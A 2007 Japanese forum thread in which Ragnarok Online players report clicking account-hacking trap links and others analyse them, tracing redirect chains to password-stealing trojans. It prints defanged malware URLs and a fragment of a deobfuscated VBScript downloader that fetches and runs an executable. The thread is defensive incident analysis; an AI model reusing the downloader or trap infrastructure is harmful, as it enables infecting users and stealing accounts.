いえ、垢ハックされて、中華に貢ぐよりは、仲間へと思い、そう書きました。
不快に思えたらなら謝罪します。ほんとすみません。

私のPCはWinMXで、周１くらいでWin Updateしています。
テンプレ熟読してないのは、ほんとすみません。

805 ：(^ー^*)ノ〜さん sage ： 2007/04/21(土) 20:13 ID:kyxxtyFR0

もし感染してても「踏んだ後にパスを入力してなければ」大丈夫のはず。
その知り合いが信頼できる方であれば、知り合いに新規垢でも作ってもらって全財産預かって貰うって手もある。
とりあえず怖ければHDDフォーマットして再セットアップ。
とりあえずそういう所に突如張られるURLはまず疑う事から始めましょ。

806 ：(^ー^*)ノ〜さん sage ： 2007/04/21(土) 20:14 ID:56Xz5NMS0

>>791
垢ハック踏んでるのは確実なんだから、いいから除去しる。除去するまでパスワード入力するなよ。

>私のPCはWinMXで、周１くらいでWin Updateしています。
ぉぃ。

# ここまでぞんざいに扱われる被害（？）者も珍しいなｗ その扱いは当然なんだけどさ。

807 ：(^ー^*)ノ〜さん sage ： 2007/04/21(土) 20:19 ID:ougT4xSz0

散々言われただろうがもう一度。
文章中に半角で「?」とあったら中華（文字化け）

808 ：(^ー^*)ノ〜さん sage ： 2007/04/21(土) 20:32 ID:Oc85bPTl0

慌てる気持ちもわかるが、慌てたところでミスが増えるだけで何かが好転するわけでもない。
パス入力さえしなければハクられることもないし、その前に気付けたことを幸運と思ってﾓﾁﾂｹ。

809 ：(^ー^*)ノ〜さん sage ： 2007/04/21(土) 20:47 ID:pOFpAupz0

WinMXでWinUpdateしてるってのがどういう意味なのかが理解できん。
MXで更新ファイル手に入れてるってことなのか？
誰か教えてくれ('A`)

810 ：(^ー^*)ノ〜さん sage ： 2007/04/21(土) 20:52 ID:Oc85bPTl0

MEの書き間違えじゃね？
XPだったら間違えすぎだが。
とりあえずMEならOS換えたほうがいいぞ。

811 ：(^ー^*)ノ〜さん sage ： 2007/04/21(土) 20:52 ID:p4LvP/680

俺もさっぱりわからねーがただの勘違いじゃないか・・・たぶん
winMXとかいちいち言う必要ないし・・・

812 ：(^ー^*)ノ〜さん sage ： 2007/04/21(土) 20:59 ID:pOFpAupz0

なるほどMEか・・thx
というかMEってまだサービス続いてたのか。

全然PCわからなそうな人でもMXやってるんだな、とか思ってしまったよ。

813 ：791 sage ： 2007/04/21(土) 21:08 ID:n/GZGtqX0

すみません、てんぱってました。
WINMEじゃなくて、XPです。
あと、マイコンピューターをウイルススキャンしたら５つウイルスが見つかりました。
いま、そのウイルス名報告します。。
この後HDDフォーマットして、再セットアップする予定です。
親切にありがとう。

814 ：(^ー^*)ノ〜さん sage ： 2007/04/21(土) 21:09 ID:zRlAAW010

斜め上

815 ：(^ー^*)ノ〜さん sage ： 2007/04/21(土) 21:21 ID:56Xz5NMS0

報告しなくていいからとっととHDDフォーマットしろ。

816 ：(^ー^*)ノ〜さん sage ： 2007/04/21(土) 21:27 ID:Oc85bPTl0

よく今まで無事だったというか何というか。
つか、5個も見付かったならRO以外の情報漏洩とかを心配したほうがいいんじゃね？
とにかく、再インスコしたらフリーでいいからアンチウィルスソフト入れとけ。
面倒だからといって入れないで、また再インスコする羽目になるのはもっと面倒だろ？

817 ：(^ー^*)ノ〜さん sage ： 2007/04/21(土) 21:29 ID:Oc85bPTl0

途中送信しちまったが、アンチウィルスソフト入ってても無警戒でアドレス踏んでたら
感染は時間の問題だからな。

818 ：(^ー^*)ノ〜さん sage ： 2007/04/21(土) 21:36 ID:fBa5F0ACO

しかし、再インスコしてアップデートしようとネットにつなぐだけで
ウィルス感染の危険が。
XPならFWある分まだましか

819 ：682 sage ： 2007/04/21(土) 21:42 ID:+FpAKxlJ0

報告。
徹底的にカスペ・S&D・ADaware各種更新・スキャン繰り返し
完全に検知０になりました。
装備・倉庫とも現在のところ無事なのも確認。
こちらのPCのセキュリティも確認できましたしいい勉強になりました。
あとは自己責任の判断にてログイン致します。
皆様の暖かい意見とアドバイスに大変お世話になりました。ｍ( )ｍ
犯人に隕石落ちる事と被害者減る事を祈って名無しに戻ります。

820 ：(^ー^*)ノ〜さん sage ： 2007/04/21(土) 21:45 ID:BBlWbYX70

【　　アドレス 　 】 www■m-phage■com/bbs
【気付いた日時】 1時間ほど前
【　 　　 OS　 　 】 Windows XP Service Pack 2
【使用ブラウザ 】 IE6.0
【WindowsUpdateの有無】 今日
【　アンチウイルスソフト 】 ウィルスバスター2007
【その他のSecurty対策 】 Spybot S&D
【 ウイルススキャン結果】 カスペルスキーオンラインスキャン
　　　　　　　　　　　　　ウィルスバスター/Spybot S&D/NOD32　すべて検知なし
【スレログやテンプレを読んだか】 (Yes)

　とんだ先が画面真っ白で、びっくりして検索。
ツールチェッカーかけてみたら危険！の文字が・・・
たまたま今日はRO繋いでませんが、大丈夫なんでしょうか・・・？

821 ：(^ー^*)ノ〜さん sage ： 2007/04/21(土) 21:47 ID:BBlWbYX70

820です
これかかれてたアドレスは、つい最近発売されたDSゲームのwikiのﾒﾆｭｰﾊﾞｰ
にありました。
なぜそんなとこに・・・

822 ：(^ー^*)ノ〜さん sage ： 2007/04/21(土) 21:49 ID:Oc85bPTl0

わかっててログインするなら止めないが、ログインするにしろ、友人に装備一式預けて
ハクられるかどうか一日くらい様子見したらどうだ？

823 ：(^ー^*)ノ〜さん sage ： 2007/04/21(土) 22:01 ID:56Xz5NMS0

>>820
垢ハックかどうかは知らないけど、VBスクリプト。
数値で記載されていて、数値をキャラクタに変換して…と検知を回避するなにかの模様。

危険なことは危険だけど、ROの垢ハック以外のものの可能性もあるね。

仮想環境用意してないので、動作確認はパス。

824 ：(^ー^*)ノ〜さん sage ： 2007/04/21(土) 22:01 ID:IdpNHG+W0

ROをつないでないのなら、垢ハックはまだ大丈夫。
感染してる可能性があるので、安心したいならHDD再インストール。
奪われる覚悟があるのなら、そのままでどうぞ。

825 ：(^ー^*)ノ〜さん sage ： 2007/04/21(土) 22:11 ID:3YcINiGB0

パンヤ界は平和だな、無害URL指定されてる

826 ：(^ー^*)ノ〜さん sage ： 2007/04/21(土) 22:17 ID:Oc85bPTl0

>>825
マジかｗ
確かにパンヤには無害だろうが、中にはパンヤとRO両方やってるのもいるだろうに・・・
それ以前にトロイ仕込まれるのに無害とはこれ如何に。

827 ：(^ー^*)ノ〜さん sage ： 2007/04/21(土) 22:23 ID:ROpW+guv0

つーかどんどん手が込んできてるな……
簡単な言葉にするのは難しいが
ウィルスとかトロイとかそういうLvじゃなくなってるぜ……

828 ：(^ー^*)ノ〜さん sage ： 2007/04/21(土) 22:33 ID:aV/L22l+0

あちらさんはゲーム、遊びじゃなくてビジネスとしておまんま食うためにしてるからな
「こんなに儲かる仕事はない。満足している」なんてインタビューに答えるくらいだから

829 ：(^ー^*)ノ〜さん sage ： 2007/04/21(土) 22:39 ID:YItvh+Tq0

だから情や良心が介入する余地がない。だから手心など全くない

830 ：(^ー^*)ノ〜さん sage ： 2007/04/21(土) 22:42 ID:3YcINiGB0

>>826
もっと怖いのは伏せてあるURLにもかかわらず何人も確認しに踏んでるところ
しかしあれだけ自信げに言われるとこっちが間違ってる気がしてきたぜ…

831 ：(^ー^*)ノ〜さん sage ： 2007/04/21(土) 22:42 ID:pIaKmC/A0

実は中華の自演かも知れないぞ

832 ：(^ー^*)ノ〜さん sage ： 2007/04/21(土) 22:51 ID:L/ah99pi0

それだ！

833 ：(^ー^*)ノ〜さん sage ： 2007/04/21(土) 23:41 ID:lvEjKXXD0

>820
そこのVSスクリプトを変換したら次のようになった。
---------------
>on error resume next
>eurl_0="http://www■ezbbsy■com/bbs/ro■exe"
>wbb41a="Adodb.St"
>ebb52k="r"
>gbb03q="eam"
>ess71x="M"
>fss12k="i"
>hss63p="crosoft.XMLHTTP"
（以下略)
---------------
まあファイル名から予想は付いたが、念のためDLして確認してみたら
Trojan-PSW.Win32.Maran.cjですた。

というわけで、思いっきりROの垢ハクウィルスを仕込む罠。

834 ：(^ー^*)ノ〜さん sage ： 2007/04/21(土) 23:50 ID:WQupkCdr0

>>820
www■m-phage■com/bbs/ (VBS/Psyme。以下のファイルをダウンロード＆実行)
→ www■ezbbsy■com/bbs/ro■exe (TSPY_MARAN.D)

ダウンローダがVBS/Psymeで、本体(ro.exe)はMARAN系トロイ。
本体の方はウイルスバスター2007で検出できました。(ダウンローダの方はバスターでは検出不可)
WindowsUpdateしてあるようですので、ダウンロードが失敗してるはずですが。

当然ながら最終的には自己責任でお願いします。

835 ：(^ー^*)ノ〜さん sage ： 2007/04/22(日) 00:18 ID:7V38FAaj0

＞820です
　詳しくありがとうございました。
あのあと怖いので新規垢とってRO内放置してますが、ログインされていません。
大丈夫みたいですね。
お世話様でした。

836 ：(^ー^*)ノ〜さん sage ： 2007/04/22(日) 00:25 ID:qqJFHBmC0

>>835
バスターが検知して止めたわけじゃないんだよな？
とりあえずもう少し放置して様子見たほうがいいと思うが・・・
今くらいのログイン率高い時間に入ってログイン合戦するのを避けるために
明け方〜午前中くらいに入る可能性も大いにある。

837 ：(^ー^*)ノ〜さん sage ： 2007/04/22(日) 00:35 ID:7V38FAaj0

＞836さん
　IEのセキュリティで　安全だとマークされてないスクリプト実行無効にする
って設定してるんですが、ここでとめられたんでしょうか？
バスターが感知して止めたわけではありません。踏んだときは無反応でした。

838 ：(^ー^*)ノ〜さん sage ： 2007/04/22(日) 00:41 ID:qqJFHBmC0

>>837
すまん、見逃してた。
WinUpdateしてるならバスターの挙動に関わらず踏んでも問題ないと思う。

839 ：(^ー^*)ノ〜さん sage ： 2007/04/22(日) 00:44 ID:7+jCZolx0

対策の中に書いてないが、hostsの変更やPG2の導入はしていない？

>【WindowsUpdateの有無】 今日
これは踏む前か踏んだ後か、どっち？
Adodb.Streamの脆弱性を使ってるタイプだから、常々WindowsUpdateしてたら
防げてるとは思うんだが。

840 ：820です sage ： 2007/04/22(日) 00:47 ID:7V38FAaj0

　WindowsUpdateは踏む前にしてました。
hostsの変更やPG2の導入はしてません。

841 ：(^ー^*)ノ〜さん sage ： 2007/04/22(日) 00:48 ID:U5B+SDVu0

>>826
がめぽ垢のハックトロイが開発されるのも時間の問題だな。

842 ：(^ー^*)ノ〜さん ： 2007/04/22(日) 08:05 ID:WD1F27s80

【　　アドレス 　 】http://www■aaa-livedoor■net/ro-navi/
【気付いた日時】 07/04/22 02:30
【　 　　 OS　 　 】 XP SP2
【使用ブラウザ 】 IE6.0
【WindowsUpdateの有無】有　最後の更新は約1週間前の4/13
優先度の高い更新プログラムは現在ありませんでした。
【　アンチウイルスソフト 】 ウィルスバスター2006
【その他のSecurty対策 】 S&D、ルータ、カスペルスキーオンラインスキャン、マカフィーオンラインスキャン
【 ウイルススキャン結果】S&Dでのみ、1件「TagASaurus」を検出。（広告表示のプログラムで無関係の様です）
他、ウィルスバスターや数箇所のオンラインスキャンを夜を徹して行いましたがHitはありませんでした。

【スレログやテンプレを読んだか】 Yes
上記のアドレスも既に何度か投稿されており戦慄しております

【説明】
RMCの引退装備売スレに紛れていました。ROやりながらだったのでAlt＋Tabでウィンドウを置き換えた時にうっかり…。
リンク先は画面真っ白で、特に文字等はありませんでした。
現在はROを落としてまだ一度もログインしていません。
未熟者が丸投げしているのは見ていて滑稽だとはわかっていますが、自分でわかるのはこれが限度です。
どうか御指導をお願いします。

843 ：(^ー^*)ノ〜さん sage ： 2007/04/22(日) 08:19 ID:6izxbOKP0

RMCはあちこちの記事に垢ハクアドレスが大量投下されてるからな
下手な鉄砲も数撃ちゃ当たるってか

844 ：(^ー^*)ノ〜さん sage ： 2007/04/22(日) 08:31 ID:771ecEqW0

このスレ初めて見たけど、あまりにも大げさなテンプレにワロタ
てかIE使ってる奴は何かの罰ゲームなの？

845 ：(^ー^*)ノ〜さん ： 2007/04/22(日) 08:42 ID:Imz2nCbr0

>>842
>【スレログやテンプレを読んだか】 Yes

じゃあやるべきことはもう分かってるだろ？
再インストールがメンドクサイ、ってなら好きにすれば？

846 ：(^ー^*)ノ〜さん sage ： 2007/04/22(日) 08:46 ID:JmJkuK4J0

つか、こんだけアカハックが騒がれてるのにいまだIE使い続けてる奴はなんなの？
そんなんアカハックして下さいって言ってるようなもんだろ、FireFox使え(･∀･)/ヾ〜〜╋┓!!!

847 ：(^ー^*)ノ〜さん sage ： 2007/04/22(日) 08:51 ID:QF3gXM7V0

>>846
FireFoxで感染した例もあるんだ、そう言ってられないぞ

848 ：(^ー^*)ノ〜さん sage ： 2007/04/22(日) 09:19 ID:nnZ81cIa0

>>843-844 >>846
雑談はLiveROへどうぞ。

>>842
wz.htm と wu.htm を読みに行く奴。>>689-690。>>698で、カスペのオンラインスキャンで検知可能だと
報告が出ている。

検知可能なものが出てこないので、入手前に切断できたと判断するか、「現時点では検知できない新型に
差し替えられていた」為に検知しないだけで感染していると判断し、ＯＳ入れなおしを敢行するかは
自己責任の範疇ということになる。

849 ：(^ー^*)ノ〜さん sage ： 2007/04/22(日) 09:19 ID:6izxbOKP0

>>847
圧倒的に感染率が低いのも事実

850 ：(^ー^*)ノ〜さん sage ： 2007/04/22(日) 09:19 ID:U5B+SDVu0

FireFoxなんてブラウザは存在しない訳だが

851 ：(^ー^*)ノ〜さん sage ： 2007/04/22(日) 09:23 ID:MyAiI/bk0

>>842
www■aaa-livedoor■net/ro-navi/　　（↓frameタグ２個）
→ www■aaa-livedoor■net/ro-navi/wz■htm　　（↓imgタグwidth=height=0で拡張子gifのhtmlファイルが１個）
　→ www■aaa-livedoor■net/ro-navi/img■gif　　（一見した限りは、特にやばくはなさそう）
→ www■aaa-livedoor■net/ro-navi/wu■htm　　（↓iframeタグ１個）
　→ www■aaa-livedoor■net/ro-navi/happy1■htm　　（VBS/Psyme。↓のファイル１個をダウンロード＆実行）　　
　　→ www■ro-bot■net/ro-navi/yan■exe　　（トロイ本体。TROJ_MARAN.FU）

まあ、いつものパターンです。
本体(yan.exe）の方はウイルスバスターでTROJ_MARAN.FUとして検出可。
ダウンローダ(happy1.htm)はバスターを含め、ほとんどのウイルス対策ソフトで検出不可。
でも、内容からしてVBS/Psymeであることは確実。

重ね重ね言っておくけど、最終的には自己判断＆自己責任でよろしく。
あなたが罠を踏んだ時間≠私が罠を調べた時間である以上、
内容が指し変わってる可能性もありますので。

852 ：(^ー^*)ノ〜さん sage ： 2007/04/22(日) 09:42 ID:nnZ81cIa0

>>842
…一部、差し替えられてるな。
一応は既知のものの様子だが１つ亜種の可能性があった。
NOD32では検知できたので、NOD32でのスキャンもお勧めしておく。

-----
wu■htm
-----
次のページをiframeで開こうとする。
1■htm
2■htm

-----
wz■htm
-----
現時点では、なにもない。ここまでは一緒。

-----
1■htm
-----
VBスクリプトで下記のファイルを入手し、実行させよとする模様。
http://www■blog-livedoor■net/game/svch■exe ではなく、
http://www■ro-bot■net/ro-navi/yan■exe になっている。
NOD32 検出名：Win32/PSW.Maron トロイの亜種

スクリプト中にある「L_fy80■exe」ってのは、一時的に作成するものかな。
（スクリプト読めなくてごめん）

こいつは、4/19段階で、Trojan-PSW■Win32■Maran■cj であり、次回更新に含めるって
返答来ているので、現時点では検知可能な筈。

exe自体が差し替えられている可能性も疑わないといけないのが厄介。
NOD32で検知した後、自動提出が行われたので、新型の亜種の可能性有り。

853 ：(^ー^*)ノ〜さん sage ： 2007/04/22(日) 09:43 ID:nnZ81cIa0

-----
2■htm
-----
下記のスクリプトを読み込む。iframeはsrc="http://" で未完成。
http://www■blog-livedoor■net/game/muxiao■js ではなく
http://www■ro-bot■net/ro-navi/muxiao■js

-----
http://www■ro-bot■net/ro-navi/muxiao■js
-----
カーソルとして、下記のファイルを表示させようとする。
http://www■ro-bot■net/ro-navi/muxiao1■jpg
http://www■ro-bot■net/ro-navi/muxiao2■jpg

muxiao1■jpg
muxiao2■jpg
NOD32：検出名 Win32/TrojanDownloader.Ani.Gen トロイの亜種
http://www■ro-bot■net/ro-navi/yan■exe を入手しようとする。

854 ：(^ー^*)ノ〜さん sage ： 2007/04/22(日) 09:44 ID:nnZ81cIa0

被った…てか、ちょっとの差で、wz.htmも中味あったのか。

855 ：(^ー^*)ノ〜さん sage ： 2007/04/22(日) 10:02 ID:nnZ81cIa0

よく見たら、差し替えられてる訳じゃなく、構成が同じだけか…誤報すまん。
検体入手しようとしてて、一瞬ファイルが見つかりませんが出て、暫く待ってから試したら入手できたとかの
挙動があったので、もしかすると現在進行形で更新中なのか、それとも、回線の問題か。

www■ro-bot■net/ro-navi/yan■exe はカスペのオンラインスキャンで「Trojan-PSW.Win32.Maran.cj」と
検知できることを確認。jpeg偽装のアニメカーソルも、「Exploit.Win32.IMG-ANI.k」として検知しました。

851さんが言われていますが「罠を踏んだ時間≠私が罠を調べた時間」であり、差し替えられているため
踏んだ時点のものが検知されなかっただけという可能性も忘れないようにしてください。

踏んだけど、サーバーが重いなどの要因で、本体入手前に切断できたので、検知しないのか、
タイミングの問題で、検知できないものを入手してしまったのかの判断ができません。
スキャンしたソフトを信用するか、HDDをフォーマットするかは、自己責任で判断願います。

856 ：851 sage ： 2007/04/22(日) 10:02 ID:MyAiI/bk0

あう。ごめ。ソースチェッカーのキャッシュ消さずに調べてた。>>851はなしね。もう１回調べなおします。

857 ：(^ー^*)ノ〜さん ： 2007/04/22(日) 10:06 ID:771ecEqW0

HDDフォーマットワロタ
IE使ってる奴はどんだけマゾだよｗｗｗｗｗｗｗｗｗ

858 ：(^ー^*)ノ〜さん sage ： 2007/04/22(日) 10:12 ID:2ztF4iXU0

ID:771ecEqW0
自称上級者はこれだから困る。

859 ：(^ー^*)ノ〜さん ： 2007/04/22(日) 10:13 ID:771ecEqW0

どの辺が自称上級者なんでしょうか？

860 ：(^ー^*)ノ〜さん sage ： 2007/04/22(日) 10:14 ID:vdVIhQgy0

>>857
人と違ったことで満足感を得る17歳を想像したｗｗｗｗｗｗｗｗｗ

861 ：(^ー^*)ノ〜さん sage ： 2007/04/22(日) 10:20 ID:QfQue/ZX0

「俺○○なんて使ってないし」は一番危ないからな

862 ：851 sage ： 2007/04/22(日) 10:28 ID:MyAiI/bk0

>>842
www■aaa-livedoor■net/ro-navi/　　（↓frame２個）
→ www■aaa-livedoor■net/ro-navi/wz■htm　　（何もなし）
→ www■aaa-livedoor■net/ro-navi/wu■htm　　（↓iframe２個）
　→ www■aaa-livedoor■net/ro-navi/1■htm　　（VBS/Psyme ↓のファイル１個をダウンロード＆実行）　　
　　→ www■ro-bot■net/ro-navi/yan■exe　　（トロイ本体。TROJ_MARAN.FU）
　→ www■aaa-livedoor■net/ro-navi/2■htm　　（↓JavaScript１個）
　　→ www■ro-bot■net/ro-navi/muxiao■js　　（↓拡張子JPEGのアニメーションカーソル２個）
　　　→ www■ro-bot■net/ro-navi/muxiao1■jpg　　（TROJ_ANICMOO.AX ↓のファイル１個をダウンロード＆実行）
　　　　→ www■ro-bot■net/ro-navi/yan■exe　　（トロイ本体。TROJ_MARAN.FU）
　　　→ www■ro-bot■net/ro-navi/muxiao2■jpg　　（TROJ_ANICMOO.AX ↓のファイル１個をダウンロード＆実行）
　　　　→ www■ro-bot■net/ro-navi/yan■exe　　（トロイ本体。TROJ_MARAN.FU）

852さんと内容かぶりまくりだけど、851の訂正ということで・・・
結局行き着く先はyan.exeなので、そこをブロックできれば、まずセーフ。
バスターで検出できるのは、maxiao1.jpg, maxiao2.jpg, yan.exeの３つ。

863 ：851 sage ： 2007/04/22(日) 10:39 ID:MyAiI/bk0

>>852
>スクリプト中にある「L_fy80■exe」ってのは、一時的に作成するものかな。

そうです。
サーバー側のファイルwww■ro-bot■net/ro-navi/yan■exeが
ローカルの%TEMP%\L_fy80■exeに作られて、実行されます。

864 ：(^ー^*)ノ〜さん sage ： 2007/04/22(日) 10:39 ID:XN6LAYwQ0

スクリプトはすり抜けようと思えばいくらでもできるから放置でいいや。
yan.exeは >>766 のnPack版Maran、比較的新しいので要注意かな。

865 ：(^ー^*)ノ〜さん sage ： 2007/04/22(日) 10:49 ID:6oaJHTrE0

そういや俺も高校んとき人と同じのが嫌で
Firebirdにしたのが始まりだったなぁ。

866 ：(^ー^*)ノ〜さん sage ： 2007/04/22(日) 14:09 ID:6mkaviQb0

差し替えが早いなぁ……
昨日見たときはro.exeだったのがyan.exeやら何やら。

ちなみに検体を拾いに行ったとき気付いたんだが、トロイを置いてる鯖の性能がどうもイマイチ。
異様にDLに時間がかかった。
UbuntuからFirefox・WindowsからIria・IEで直接DL、の３パターンで拾いにかかったが
どれもタイムアウトしたり。
拾えたと思ったら破損ファイルになってたりで、まともに仕込まれるのか？と逆に心配になった。

IIS6.0と返ってきたので鯖はWindowsServer2003で動いてるようだが、帯域やらの関係かねぇ？

867 ：(^ー^*)ノ〜さん sage ： 2007/04/22(日) 14:43 ID:nnZ81cIa0

>>886
確かにサーバーが遅いが、機嫌がいいとすぐくるぞ。むっちゃ遅い時もあるけど。
あっちでは、個人のＰＣをサーバーとして使うみたいだから、そういうもんかもな。

気軽に差し替えをしてくるのは厄介といえば厄介。
検体送ったら、送ったのは無害だったが、同アドレスのものは新種でしたので対応しましたとか。
回答時も、「確認時点では検出できました」ので、検出されていなければ入手前だった「可能性」が
ありますとか表現に気をつけないといけないですね。

本当に「罠を踏んだ時間≠罠を調べた時間」で差し変わる可能性が高いのが問題。
殆どは、実行ファイルの圧縮形式を変更する形でやってくると思うので、パターンにない
ものでも極力検知する方式のセキュリティソフトを利用することがより重要になるね。
−−−−−
ところで、LiveROの方にあった、ログイン競争になってしまった場合の解決策として
PG2を利用する方法が挙げられていたけど、あれはこっちに持ってきといた方がいいんじゃないかな。

セキュリティ対策、質問・雑談スレ
http://enif.mmobbs.com/test/read.cgi/livero/1173878067/817-818

で、PG2のセーフリストは、これで接続できてます。

//--- ↓をテキストファイルにしてセーフリストに登録
UCOM Corporation:219.123.155.000-219.123.155.255
UCOM Corporation:221.247.195.000-221.247.195.255
RAGNAROK-JP:061.215.212.000-061.215.212.255
RAGNAROK-JP2:061.215.214.128-061.215.214.255
RAGNAROK-JP2:211.013.228.000-211.013.228.255
RAGNAROK-JP3:211.013.232.000-211.013.232.255
RAGNAROK-JP4:211.013.235.000-211.013.235.255
GUNGHO-MODE:211.013.229.000-211.013.229.255
WEB-SYSTEM:061.215.220.064-061.215.220.255
//↑ここまでを記録。コメント行は入れないように。

868 ：(^ー^*)ノ〜さん sage ： 2007/04/22(日) 15:22 ID:MyAiI/bk0

>>867
IPリストの最初の２行なんだけど、
全然別の会社が取得しているIPも含まれてるっぽいので
LiveROの817にあるとおり

GUNGHO-PAT1:219.123.155.160-219.123.155.191
GUNGHO-PAT1:221.247.195.160-221.247.195.191

の範囲を指定するのが、適切だと思います。
whoisで調べると、上記がGungHoの所持しているIPになってます。
↑の設定でまだ１週間程度の実績しかないですが、
今のところ問題なくつながってます。

869 ：(^ー^*)ノ〜さん sage ： 2007/04/22(日) 15:36 ID:nnZ81cIa0

>>868
指摘感謝。直して使うわ。

まとめサイトにもPG2導入方法とか載せたらどうかな？
リネージュ資料室に、中国とかのIP一覧あるから、踏んでしまったときの送信防止として。

PG2入れようとして、まとめサイトになくてちょっと不便を感じたので。

870 ：(^ー^*)ノ〜さん sage ： 2007/04/22(日) 15:58 ID:teg1ylYa0

PG2による全範囲禁止の手法って、解ってる人には極めて有効だと思いますが、
ttp://enif.mmobbs.com/test/read.cgi/livero/1173878067/477 で指摘されているように、
グローバルIPでない場合はすんなり行かないケースがあると思います。
初心者の人に勧める時は、その辺りの注意が必要かもしれませんね

871 ：(^ー^*)ノ〜さん sage ： 2007/04/22(日) 15:58 ID:6mkaviQb0

>869
まとめサイトにはPG2の導入ページは存在してる。
>ttp://sky.geocities.jp/vs_ro_hack/pg2.htm
ただTOPから直接飛べないから見落としやすいので、判りやすくした方が
いいとは思う＞まとめサイトの人

それと最近の被害報告等を見る限り、hosts変更とPG2導入は>6の簡易まとめの
中に入れて、積極的に勧めた方がいいんじゃないだろうか。
この2つをしてるかどうかでかなり違うし。

hostsを自動更新出来るように出来れば楽になるんだが、使用環境で変わるのが何とも。
面倒くさがりなギルメン用にツール作ろうかと思案中なんだが、なかなか……

872 ：(^ー^*)ノ〜さん sage ： 2007/04/22(日) 16:00 ID:6mkaviQb0

後テンプレの報告欄に
【hosts変更】(有/無　[有りの場合は最終更新は何時ごろか])
【PeerGuardian2導入】(有/無 [有りの場合は参照元サイトはどこか)
を入れたほうがいいような気もする。

追加してたら、報告者もこれらが重要な対策だ、と気付いてくれる気がする。

873 ：(^ー^*)ノ〜さん sage ： 2007/04/22(日) 16:34 ID:nnZ81cIa0

>>870
全拒否ではなくても、リネージュ資料室にある２つのリストを指定するだけで十分じゃないかな。
今の所、日本国内サイトに垢ハックトロイの実体置かれたり、収集先が日本国内だったりするケースは
報告されてない訳だし、それなら自分の使っているDNS鯖とかのブロックはしないで済む筈。

Lineageトロイ http://lineage.nyx.bne.jp/misc/security/lintrojan.txt
中国・韓国・台湾 http://lineage.nyx.bne.jp/misc/security/cnkrtw.txt

>>871
あったんですね。気づかないで申し訳なかった。
でも、そのページだけだと、ROの領域の許可方法が抜けてますね。

P2Pブロックをかけなければ、ROの許可しなくても、通信できるんですけど、
P2Pとスパイウェアのリストもブロックに入れちゃってたもので、私は設定に困りました。
PG2公式ユーザガイド見ながらだと、推奨でP2Pブロックにチェックするようになってるので
他の人もはまるかなと。

874 ：(^ー^*)ノ〜さん sage ： 2007/04/22(日) 17:00 ID:6mkaviQb0

>873
そろそろセキュスレ向きな気がしないでもないが、それだと意味が無いというか勘違いしてる。

セキュスレに書かれた方法は全IPを拒否した上でRO関係の通信のみを許可し、他に情報が
全く流れない状態を作る。
つまり既知のハクアドレスだけじゃなく未知のアドレスもブロックして、パス変更を行っても
他に漏れない状態を作りあげるのが目的。
これなら設定をミスって無ければ、感染した状態でパス変更しても漏れない。
つまりパス変更しつつログイン競争を行う事が可能になる。

>873のは単にP2Pリストを外せで終わる話。
さらに言えば、中韓台のリストを組み込んでいたところで、未知のアドレスに対して送信とか
jpドメイン宛に送信される設定とかになってるトロイには全くの無力。
今はないとは言え、例えば多数報告のある ofsfbなODN に対してパスを送信するタイプが
出た場合その設定だとログイン競争をした場合、パスが漏れる。

全拒否設定の方は、目的がそもそも違う。
中韓台をブロックするだけで100%安全と言えるなら、あの話は出てきてないよ。

875 ：(^ー^*)ノ〜さん sage ： 2007/04/22(日) 17:04 ID:XN6LAYwQ0

>>867
ファイルの差し替えについてはチェックするしかないなぁ。
リネージュ資料室のウィルス更新状況みたいにCGI流すとか、
ローカルでやるならWWWCとか。自分は改造したWWWD
(USER_AGENTで蹴られると嫌なので書き換えてある)。

圧縮形式の変更はあまりやってないみたい。
一連のlovetw・zhangweijp系ほとんどUpackで、
先週あたりから試験的にnPackを投入している感じ
他ではUPX、NSPack、ASPack、BEP、PEC2、FSGなどがたま〜に。

876 ：(^ー^*)ノ〜さん sage ： 2007/04/22(日) 17:45 ID:66Korv5H0

>まとめサイトの人
個人的な要望で申し訳ないんですが、危険サイト・ドメインのリストの内容を
単体のテキストにまとめて置く事は出来ないでしょうか？

ttp://sky.geocities.jp/vs_ro_hack/hosts.htm の中から # Trojan trap sites から
# End of trojan trap sitesだけを記載してるファイル、という意味です。

もしそれが可能ならwgetとcopyコマンドを利用してhostsの自動更新バッチファイルが
作成出来、タスクに組み込めばPG2の更新と同等の自動更新設定出来るのですが……

ギルメンの対策状況を見てる限り、hostsをまめに更新してる人が少ないようで、自動更新の
バッチファイルが作れたら、タスクに放り込むだけでかなりの対策強化になると思うのです。

>871氏と同様、自動更新するツールを作ってるんですが、それがあるとバッチファイル1つで
済むので導入を勧めやすくなるのです。
自作ツールだとソースが読めないと信憑性が疑われやすいという問題もありまして……

御一考頂けたら幸いです。

877 ：(^ー^*)ノ〜さん sage ： 2007/04/22(日) 18:10 ID:nnZ81cIa0

>>874
全拒否の理由はわかってるよ。でも、自分のDNSやらゲートウェイやら必要なものを手動で解除しないと
許可リストのサイトへの接続すらできなくなって現実的ではない。

PG2を入れていない人に対する説明を行なう為に「実際的」なのは盗み出されたパスワード等を送信させない宛て先として
既知の送信先の中国等を一括禁止するだけで安全性が上がる。そのブロックしなければならない未知のアドレスは
その中に含まれている可能性が高く、PG2を導入させる意味があるってこと。

自分のDNSの確認方法がわからない場合、それを探している間、自分がパスワード変更できなくなってしまう。
それはパスワード変更合戦になっている段階では致命的欠点。迅速さと完璧ではないまでもかなり有効な対策として
踏んでしまった場合、パスワード変更前に、PG2を導入して一定範囲の送信をブロックすることには意義が有るよ。

完璧な対応を求める余り、本末転倒になっちゃだめだよ。

878 ：(^ー^*)ノ〜さん sage ： 2007/04/22(日) 18:14 ID:KMiXEDf40

>>877
俺にはあんたの言ってる事の方が的外れな気がするが・・・

879 ：(^ー^*)ノ〜さん sage ： 2007/04/22(日) 18:17 ID:KFFhhmP30

LiveROでもこっちとまたいで同じネタやるならどっちかに統一したら？

880 ：(^ー^*)ノ〜さん sage ： 2007/04/22(日) 18:22 ID:MyAiI/bk0

>>876
一点注意があるんだけど、hostsの変更を自動で行った場合、
危険性もそれなりに付きまといます。例えば、

（罠サイトのIPアドレス）　www.google.co.jp

という設定をhostsに書き込むと、googleに繋いだときに、
罠サイトに飛ばされるようになります。
要は万一中華にそのページをハッキングされ、内容を改ざんされたら・・・

念には念を入れて、IPの方は強制的に127.0.0.1に書き換えるか、
127.0.0.1で始まらない行はもう無視するかした方が良いように思います。
あるいは、ホスト名のリストだけにしてもらって、127.0.0.1は自分で
付加するとかなら、バッチファイルで実現できるかな。

まあ、実際にはそうそう簡単にハッキング食らうこともないとは思いますが、
何でもやる連中なので、念のためそんな危険性もありますよとだけ。

881 ：(^ー^*)ノ〜さん sage ： 2007/04/22(日) 18:23 ID:bECDfUmq0

パスワード変更合戦に陥ったときに
・PG2をDLしてインストールして
